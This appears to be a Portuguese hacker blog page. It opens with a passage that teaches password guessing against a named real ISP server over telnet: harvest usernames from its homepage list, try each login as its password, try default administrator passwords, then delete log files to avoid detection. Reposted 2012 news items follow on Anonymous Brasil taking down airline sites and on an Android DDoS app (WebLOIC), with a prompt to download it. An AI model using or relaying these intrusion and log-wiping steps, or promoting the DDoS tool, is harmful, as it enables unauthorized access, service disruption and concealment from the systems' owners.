1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain

MÃOS A OBRA !!!
Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. O penúltimo método também é descrito detalhadamente no FAQ alt.2600.
Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).
Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubra quais são as senhas padrões para o administrador em cada sistema. Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair. Veja o FAQ alt.2600 para saber o que são arquivos log, caso você não saiba.

Poderar gostar de;

Site das empresas aéreas TAM e Gol são atacados por Hackers

Sat, 25 Feb 2012 02:27:00 +0200

Sites das empresas aéreas TAM e Gol são atacados por hackers

Os sites das companhias aéreas TAM e Gol apresentaram no final da manhã desta quarta-feira (15) instabilidades no acesso e ficaram fora do ar.

O grupo de hackers Anonymous Brasil indicou em seu perfil no Twitter ser o autor de um suposto ataque virtual que teria derrubado as duas páginas.

Por meio de nota, as duas companhias aéreas admitem instabilidade no acesso, mas não citam suposto ataque como motivo do problema.

- A GOL informa que passou por um momento de instabilidade em seu website e está trabalhando para normalizar o sistema o mais rápido possível.

- A TAM Linhas Aéreas informa que seu site está apresentando instabilidade nesta quarta-feira, 15. Nossa área de Tecnologia da Informação está tomando as providências necessárias para normalizar a operação. Recomendamos aos clientes que tiverem alguma dificuldade de acesso, que utilizem nossos outros canais de atendimento, como a Central de Vendas – 4002-5700 (capitais) e 0800-570-5700 (demais localidades) e o Fale com o Presidente – 0800-123-200.

Em uma segunda nota, divulgada no começo desta tarde, a Gol diz que o problema foi resolvido.

- A GOL informa que passou por um momento de instabilidade em seu website, mas o sistema já está normalizado.

Na semana passada, o mesmo grupo disse ter tirado do ar 90% dos sites da Bahia, em nome do “trabalhador baiano” em meio a uma greve da Polícia Militar do Estado que resultou em dezenas de mortos.

De 29 de janeiro a 4 de fevereiro, o Anonymous Brasil divulgou uma operação de nome #OpWeeksPayment com supostos ataques a sites de instituições financeiras. No período, apresentaram problemas as páginas dos bancos Itáu, Bradesco, Banco do Brasil, HSBC, PanAmericano, Citibank e BMG, além dos sites do Banco Central do Brasil e da Febraban (Federação Brasileira dos Bancos). Também caíram os sites das empresas Cielo e Redecard.

Poderar gostar de;

Hackers Anonymous desenvolveram ferramenta de DDoS WebLOIC para Android Mobile

Sat, 25 Feb 2012 02:26:00 +0200

Hackers Anonymous desenvolveram ferramenta de DDoS WebLOIC para Android Mobile

Estes Dias Grupo hacker anônimo usando um WebLOIC nova ferramenta. Esta ferramenta é ainda mais fácil de usar do que ferramentas DDOS LOIC, sem necessidade de download, ele envia solicitações usando o JavaScript no browser do usuário. Assim como LOIC, é um caminho rápido para a prisão, o envio de milhares de pedidos a partir de seu endereço IP para o destino, acompanhada por um slogan.

Recentemente Hackers versão e nova interface de WebLOIC, ou seja. para Android móvel na forma de um aplicativo chamado "Android LOIC parágrafo por Alfred". Eles Espalhe esta ferramenta via anônimos contas de redes sociais para executar o novo ataque em várias operações anônimos contra governo argentino - como # # opargentina Iberoamérica.

Quando atacante clique em "Fire", um JavaScript terá envia 1.000 solicitações HTTP com a mensagem "Estamos LEGION!" Que realizam ataques DoS de URL alvo.

Baixe o aplicativo aqui

Poderar gostar de;